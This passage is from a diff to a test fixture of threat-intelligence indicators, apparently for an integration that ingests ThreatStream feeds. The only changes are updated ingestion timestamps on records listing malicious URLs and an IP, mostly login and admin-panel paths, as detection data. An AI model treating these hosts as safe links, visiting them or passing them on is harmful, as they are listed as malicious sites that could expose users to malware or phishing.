mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--c8559f01-42c4-42f1-8464-e2e2e2af84d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:26.003Z\",\"name\":\"mal_url: http://10123.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10123.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:26.003Z\"}", "category": "threat", "type": "indicator", @@ -7161,7 +7161,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023380100Z", + "ingested": "2021-12-14T14:57:43.118221478Z", "original": "{\"created\":\"2020-01-26T02:57:30.579Z\",\"description\":\"TS ID: 55256890134; iType: mal_url; State: active; Org: Reg.Ru Hosting; Source: CyberCrime\",\"id\":\"indicator--5898c646-c44b-4365-9d82-77bb1705b6de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:57:30.579Z\",\"name\":\"mal_url: http://u0929560.cp.regruhosting.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://u0929560.cp.regruhosting.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:30.579Z\"}", "category": "threat", "type": "indicator", @@ -7212,7 +7212,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023386200Z", + "ingested": "2021-12-14T14:57:43.118221889Z", "original": "{\"created\":\"2020-01-27T02:54:45.711Z\",\"description\":\"TS ID: 55259870663; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--f5e450ee-d6c5-4a92-bfb4-4f8025b8c7e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:54:45.711Z\",\"name\":\"mal_url: http://turames3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:54:45.711Z\"}", "category": "threat", "type": "indicator", @@ -7263,7 +7263,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023389900Z", + "ingested": "2021-12-14T14:57:43.118222277Z", "original": "{\"created\":\"2020-01-27T02:54:59.928Z\",\"description\":\"TS ID: 55259870666; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--05b6bf66-2f31-4640-9ecd-9f8a3408d594\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:54:59.928Z\",\"name\":\"mal_url: http://turames.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:54:59.928Z\"}", "category": "threat", "type": "indicator", @@ -7314,7 +7314,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023395700Z", + "ingested": "2021-12-14T14:57:43.118222673Z", "original": "{\"created\":\"2020-01-27T02:55:12.572Z\",\"description\":\"TS ID: 55259870784; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ff7fb9bd-e816-4a76-ae5c-72c22980c722\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:12.572Z\",\"name\":\"mal_url: http://bumaga5.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bumaga5.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:12.572Z\"}", "category": "threat", "type": "indicator", @@ -7365,7 +7365,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023399700Z", + "ingested": "2021-12-14T14:57:43.118223129Z", "original": "{\"created\":\"2020-01-27T02:55:14.232Z\",\"description\":\"TS ID: 55259870699; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--b0a1e3ec-d523-4e98-90d6-8ad3daa321d3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:14.232Z\",\"name\":\"mal_url: http://mogute.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogute.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:14.232Z\"}", "category": "threat", "type": "indicator", @@ -7416,7 +7416,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023403900Z", + "ingested": "2021-12-14T14:57:43.118223781Z", "original": "{\"created\":\"2020-01-27T02:55:14.255Z\",\"description\":\"TS ID: 55259870694; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--92f0ba43-ec1f-4a37-b933-33ddd3da7e2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:14.255Z\",\"name\":\"mal_url: http://moguto.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moguto.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:14.255Z\"}", "category": "threat", "type": "indicator", @@ -7467,7 +7467,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023407900Z", + "ingested": "2021-12-14T14:57:43.118224167Z", "original": "{\"created\":\"2020-01-27T02:55:30.174Z\",\"description\":\"TS ID: 55259870793; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ea0af135-c3c0-4e4e-96d9-bdf1ebb9699e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:30.174Z\",\"name\":\"mal_url: http://bumaga1.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bumaga1.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.174Z\"}", "category": "threat", "type": "indicator", @@ -7518,7 +7518,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023411900Z", + "ingested": "2021-12-14T14:57:43.118224743Z", "original": "{\"created\":\"2020-01-27T02:55:30.287Z\",\"description\":\"TS ID: 55259870765; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--0de60f9b-7383-4c60-9caf-c578c3682487\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-27T02:55:30.287Z\",\"name\":\"mal_url: http://dufre1in.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre1in.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.287Z\"}", "category": "threat", "type": "indicator", @@ -7569,7 +7569,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023417Z", + "ingested": "2021-12-14T14:57:43.118225230Z", "original": "{\"created\":\"2020-01-27T02:55:30.319Z\",\"description\":\"TS ID: 55259870697; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--e8d57d94-82ce-4ce3-a983-d6928172d795\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:30.319Z\",\"name\":\"mal_url: http://moguti.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moguti.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.319Z\"}", "category": "threat", "type": "indicator", @@ -7621,7 +7621,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023420900Z", + "ingested": "2021-12-14T14:57:43.118225614Z", "original": "{\"created\":\"2020-01-27T02:55:30.343Z\",\"description\":\"TS ID: 55259870654; iType: mal_url; State: active; Org: Lir Ukraine LLC; Source: CyberCrime\",\"id\":\"indicator--4b567c10-4d32-40e4-87fd-b4654de5bf6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-27T02:55:30.343Z\",\"name\":\"mal_url: http://stcubegames.netxi.in/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stcubegames.netxi.in/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.343Z\"}", "category": "threat", "type": "indicator", @@ -7672,7 +7672,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023424400Z", + "ingested": "2021-12-14T14:57:43.118226006Z", "original": "{\"created\":\"2020-01-27T02:55:34.56Z\",\"description\":\"TS ID: 55259870763; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ab82b31f-02c9-4d98-b49f-21ab18a48b1b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-27T02:55:34.56Z\",\"name\":\"mal_url: http://dufre3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:34.56Z\"}", "category": "threat", "type": "indicator", @@ -7723,7 +7723,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023427900Z", + "ingested": "2021-12-14T14:57:43.118226463Z", "original": "{\"created\":\"2020-01-27T02:55:34.609Z\",\"description\":\"TS ID: 55259870730; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--47a1bc0c-5444-4c92-a0f8-a51655dd84e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:34.609Z\",\"name\":\"mal_url: http://merop12.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merop12.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:34.609Z\"}", "category": "threat", "type": "indicator", @@ -7774,7 +7774,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023431700Z", + "ingested": "2021-12-14T14:57:43.118226904Z", "original": "{\"created\":\"2020-01-27T02:55:36.798Z\",\"description\":\"TS ID: 55259870681; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--e3ee6b9d-f8cd-42fa-8f51-bb0d54446734\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:36.798Z\",\"name\":\"mal_url: http://ramesvet.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesvet.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:36.798Z\"}", "category": "threat", "type": "indicator", @@ -7825,7 +7825,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023435800Z", + "ingested": "2021-12-14T14:57:43.118227295Z", "original": "{\"created\":\"2020-01-27T02:55:38.721Z\",\"description\":\"TS ID: 55259870761; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ce0e3226-1587-4fd1-bdd0-aa76c548e8df\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:38.721Z\",\"name\":\"mal_url: http://dufres.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufres.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:38.721Z\"}", "category": "threat", "type": "indicator", @@ -7876,7 +7876,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023440900Z", + "ingested": "2021-12-14T14:57:43.118227767Z", "original": "{\"created\":\"2020-01-27T02:55:45.512Z\",\"description\":\"TS ID: 55259870706; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--9c90ff74-a454-49c7-afa8-1339915ceac8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:45.512Z\",\"name\":\"mal_url: http://mogut3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogut3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:45.512Z\"}", "category": "threat", "type": "indicator", @@ -7927,7 +7927,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023445300Z", + "ingested": "2021-12-14T14:57:43.118228262Z", "original": "{\"created\":\"2020-01-27T02:55:48.012Z\",\"description\":\"TS ID: 55259870655; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--15806179-df3f-450a-baf5-8e2a29d87faa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-27T02:55:48.012Z\",\"name\":\"mal_url: http://vidar321.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vidar321.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:48.012Z\"}", "category": "threat", "type": "indicator", @@ -7978,7 +7978,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023474600Z", + "ingested": "2021-12-14T14:57:43.118228652Z", "original": "{\"created\":\"2020-01-27T02:55:50.673Z\",\"description\":\"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:55:50.673Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:50.673Z\"}", "category": "threat", "type": "indicator", @@ -8029,7 +8029,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023479800Z", + "ingested": "2021-12-14T14:57:43.118229036Z", "original": "{\"created\":\"2020-01-27T02:56:02.067Z\",\"description\":\"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime\",\"id\":\"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-01-27T02:56:02.067Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:02.067Z\"}", "category": "threat", "type": "indicator", @@ -8080,7 +8080,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023485700Z", + "ingested": "2021-12-14T14:57:43.118229666Z", "original": "{\"created\":\"2020-01-27T02:56:03.948Z\",\"description\":\"TS ID: 55259870672; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ee8c37a6-cb8b-478c-b527-2506637ceb34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:03.948Z\",\"name\":\"mal_url: http://turams.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turams.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:03.948Z\"}", "category": "threat", "type": "indicator", @@ -8131,7 +8131,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023491300Z", + "ingested": "2021-12-14T14:57:43.118230074Z", "original": "{\"created\":\"2020-01-27T02:56:05.787Z\",\"description\":\"TS ID: 55259870662; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--fd1feff8-dcc5-429a-953d-0bb80951bf5c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:56:05.787Z\",\"name\":\"mal_url: http://turames8.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames8.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:05.787Z\"}", "category": "threat", "type": "indicator", @@ -8182,7 +8182,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023498100Z", + "ingested": "2021-12-14T14:57:43.118230459Z", "original": "{\"created\":\"2020-01-27T02:56:17.615Z\",\"description\":\"TS ID: 55259870820; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--f69535bc-4059-445d-90b0-1df8498137a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:17.615Z\",\"name\":\"mal_url: http://2maga.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2maga.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:17.615Z\"}", "category": "threat", "type": "indicator", @@ -8233,7 +8233,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023503900Z", + "ingested": "2021-12-14T14:57:43.118230849Z", "original": "{\"created\":\"2020-01-27T02:56:17.653Z\",\"description\":\"TS ID: 55259870704; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--a372cefa-0694-4e39-aa50-67be2cded923\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:56:17.653Z\",\"name\":\"mal_url: http://mogutse.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogutse.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:17.653Z\"}", "category": "threat", "type": "indicator", @@ -8284,7 +8284,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023507500Z", + "ingested": "2021-12-14T14:57:43.118231350Z", "original": "{\"created\":\"2020-01-27T02:56:22.845Z\",\"description\":\"TS ID: 55259870661; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ff74ddcd-b63b-4c1d-b4e0-8703b74564ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:22.845Z\",\"name\":\"mal_url: http://turamesplus.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turamesplus.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:22.845Z\"}", "category": "threat", "type": "indicator", @@ -8335,7 +8335,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023511200Z", + "ingested": "2021-12-14T14:57:43.118231998Z", "original": "{\"created\":\"2020-01-27T02:56:23.51Z\",\"description\":\"TS ID: 55259870713; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--360f60db-e8ca-4ede-9f65-7dcb01425d2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:23.51Z\",\"name\":\"mal_url: http://merops.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merops.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:23.51Z\"}", "category": "threat", "type": "indicator", @@ -8386,7 +8386,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023514900Z", + "ingested": "2021-12-14T14:57:43.118232458Z", "original": "{\"created\":\"2020-01-27T02:56:23.555Z\",\"description\":\"TS ID: 55259870702; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bafd8878-321e-4501-ae0f-221772acccae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:23.555Z\",\"name\":\"mal_url: http://mogut.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogut.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:23.555Z\"}", "category": "threat", "type": "indicator", @@ -8437,7 +8437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023520300Z", + "ingested": "2021-12-14T14:57:43.118232856Z", "original": "{\"created\":\"2020-01-27T02:56:32.951Z\",\"description\":\"TS ID: 55259870813; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--21811787-57db-4ca6-abb9-57d33500a88e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:32.951Z\",\"name\":\"mal_url: http://2magas.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2magas.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:32.951Z\"}", "category": "threat", "type": "indicator", @@ -8488,7 +8488,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023527800Z", + "ingested": "2021-12-14T14:57:43.118233247Z", "original": "{\"created\":\"2020-01-27T02:56:37.65Z\",\"description\":\"TS ID: 55259870741; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--80641a7e-afbf-4b8d-96e6-4770491297b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-27T02:56:37.65Z\",\"name\":\"mal_url: http://merakim.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merakim.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:37.65Z\"}", "category": "threat", "type": "indicator", @@ -8539,7 +8539,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023531700Z", + "ingested": "2021-12-14T14:57:43.118233655Z", "original": "{\"created\":\"2020-01-27T02:56:37.697Z\",\"description\":\"TS ID: 55259870659; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--fb351f4a-90ab-4ff4-a482-b38e7f92bb77\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:37.697Z\",\"name\":\"mal_url: http://turamesv.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turamesv.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:37.697Z\"}", "category": "threat", "type": "indicator", @@ -8590,7 +8590,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023537800Z", + "ingested": "2021-12-14T14:57:43.118234118Z", "original": "{\"created\":\"2020-01-27T02:56:41.827Z\",\"description\":\"TS ID: 55259870687; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--a5ade447-681b-4518-8ea5-779d9de3ff0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:41.827Z\",\"name\":\"mal_url: http://ramesv.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesv.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:41.827Z\"}", "category": "threat", "type": "indicator", @@ -8641,7 +8641,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023543600Z", + "ingested": "2021-12-14T14:57:43.118234600Z", "original": "{\"created\":\"2020-01-27T02:56:41.874Z\",\"description\":\"TS ID: 55259870674; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--9a797de6-1aa1-4f5c-b40a-c65699117f57\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-27T02:56:41.874Z\",\"name\":\"mal_url: http://roninrol.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://roninrol.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:41.874Z\"}", "category": "threat", "type": "indicator", @@ -8692,7 +8692,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023547800Z", + "ingested": "2021-12-14T14:57:43.118234988Z", "original": "{\"created\":\"2020-01-27T02:56:49.344Z\",\"description\":\"TS ID: 55259870678; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--7a094f4c-d57d-4bad-9258-a19210782331\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:49.344Z\",\"name\":\"mal_url: http://ramesvet8.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesvet8.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:49.344Z\"}", "category": "threat", "type": "indicator", @@ -8743,7 +8743,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023552200Z", + "ingested": "2021-12-14T14:57:43.118235392Z", "original": "{\"created\":\"2020-01-27T02:56:53.905Z\",\"description\":\"TS ID: 55259870709; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--6de4e500-4c56-4288-aa8f-b092f194ff78\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:53.905Z\",\"name\":\"mal_url: http://meropsi.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropsi.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:53.905Z\"}", "category": "threat", "type": "indicator", @@ -8788,7 +8788,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023558100Z", + "ingested": "2021-12-14T14:57:43.118235884Z", "original": "{\"created\":\"2020-01-27T02:57:06.376Z\",\"description\":\"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:06.376Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:06.376Z\"}", "category": "threat", "type": "indicator", @@ -8839,7 +8839,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023562200Z", + "ingested": "2021-12-14T14:57:43.118236409Z", "original": "{\"created\":\"2020-01-27T02:57:09.474Z\",\"description\":\"TS ID: 55259870721; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--0e9df710-3a24-4070-9576-f3081708cd67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:09.474Z\",\"name\":\"mal_url: http://meropa.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 